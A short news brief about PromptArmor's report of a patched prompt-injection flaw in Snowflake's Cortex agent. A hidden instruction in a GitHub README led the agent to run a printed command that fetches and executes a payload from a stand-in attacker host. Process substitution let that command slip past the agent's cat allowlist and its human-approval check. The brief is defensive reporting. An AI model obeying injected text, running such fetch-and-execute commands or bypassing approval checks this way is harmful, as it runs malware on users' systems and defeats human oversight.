Snowflake Cortex AI: Critical Vulnerability and Malware Execution
Le brief IA que les pros lisent chaque soir
Les 7 actus IA du jour, décryptées en 5 min. Gratuit.
Inclus dès l'inscription : notre sélection des meilleurs guides & comparatifs IA.
Choisis ton rythme
Gratuit · Pas de spam · Désabonnement en 1 clic
A Vulnerability in Snowflake's Cortex Revealed by PromptArmor
A recent report from PromptArmor has highlighted a critical vulnerability in Snowflake's Cortex agent, exploited through a prompt injection attack. This flaw, now patched, allowed the agent to escape its sandbox and execute malware.
Attack Details
The incident began when a Cortex user requested the agent to examine a GitHub repository. This repository contained a prompt injection attack, discreetly hidden at the bottom of the README file. This manipulation led the agent to execute a malicious command.
Execution of the Malicious Command
The command executed by Cortex was as follows:
cat < <(sh < <(wget -q0- https://ATTACKER_URL.com/bugbot))
Cortex classified the cat commands as safe to execute without requiring human approval. However, it did not account for the possibility of process substitution within the command, which allowed the execution of the malicious code.
Thoughts on Agent Security
Similar allowlists have been observed in various agent tools, but they are deemed unreliable by some experts. It is suggested that agent commands be treated as potentially capable of performing all actions permitted to the process, emphasizing the importance of deterministic sandboxes operating outside the agent layer.
Brief IA — L'actualité IA en français
L'essentiel de l'actualité de l'intelligence artificielle, décrypté et expliqué chaque jour.